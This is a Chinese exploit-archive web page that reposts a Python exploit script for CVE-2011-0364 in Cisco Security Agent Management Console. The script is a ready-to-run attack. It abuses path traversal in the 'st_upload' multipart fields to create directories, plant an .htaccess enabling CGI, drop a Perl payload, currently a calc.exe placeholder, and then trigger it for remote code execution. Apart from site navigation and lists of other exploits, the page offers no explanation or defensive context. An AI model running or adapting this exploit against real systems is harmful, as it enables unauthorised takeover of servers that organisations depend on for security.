首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco Security Agent Management Console ‘st_upload’ RCE Exploit
来源:gerry.eisenhaur@gmail.com 作者:Eisenhaur 发布时间:2011-04-13  

#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur <gerry.eisenhaur@gmail.com>

import httplib
import mimetools
import StringIO

_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"

# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"

def send_request(params=None):
    buf = StringIO.StringIO()
    headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}

    for(key, value) in params.iteritems():
        buf.write('--%s\r\n' % _boundary)
        buf.write('Content-Disposition: form-data; name="%s"' % key)
        buf.write('\r\n\r\n%s\r\n' % value)
    buf.write('--' + _boundary + '--\r\n\r\n')
    body = buf.getvalue()

    conn = httplib.HTTPSConnection(_csamc)
    conn.request("POST", "/csamc60/agent", body, headers)
    response = conn.getresponse()
    print response.status, response.reason
    conn.close()

def main():
    ### Build up required dir tree
    dirtree = ["../bin/webserver/htdocs/diag/bin",
               "../bin/webserver/htdocs/diag/bin/webserver",
               "../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
    _params = {
        'host_uid': _host_uid,
        'jobname': None,
        'host': "aa",
        'diags': " ",
        'diagsu': " ",
        'profiler': " ",
        'extension': "gee",
    }
    for path in dirtree:
        print "[+] Creating directory: %s" % path
        _params['jobname'] = path
        send_request(_params)

    ### Done building path, drop files
    print "[+] Dropping .htaccess"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/",
        'diags': "",
        'diagsu': "",
        'profiler': htaccess,
        'extension': "/../.htaccess",
    })

    print "[+] Dropping payload"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/htdocs/gerry",
        'diags': perl_path,
        'diagsu': "",
        'profiler': backdoor,
        'extension': "/../exploit.gee",
    })

    print "[+] Done, Executing dropped file."
    try:
        conn = httplib.HTTPSConnection(_csamc, timeout=1)
        conn.request("GET", "/csamc60/exploit.gee")
        response = conn.getresponse()
        print response.status, response.reason
        print response.read()
    except httplib.ssl.SSLError:
        pass
    print "[+] Finished."

if __name__ == '__main__':
    main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VeryTools Video Spirit Pro <=
·OpenText FirstClass Client v 1
·Winamp 5.6.1 .m3u8 Buffer Over
·Wordtrainer 3.0 .ORD File Buff
·Winamp 5.6.1 Install Language
·Microsoft HTML Help <= 6.1 Sta
·tmux '-S' Option Incorrect Set
·Microsoft Host Integration Ser
·Vallen Zipper V2.30 .ZIP File
·Microsoft Reader <= 2.1.1.3143
·VeryTools Video Spirit Pro 1.7
·Microsoft Reader <= 2.1.1.3143
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved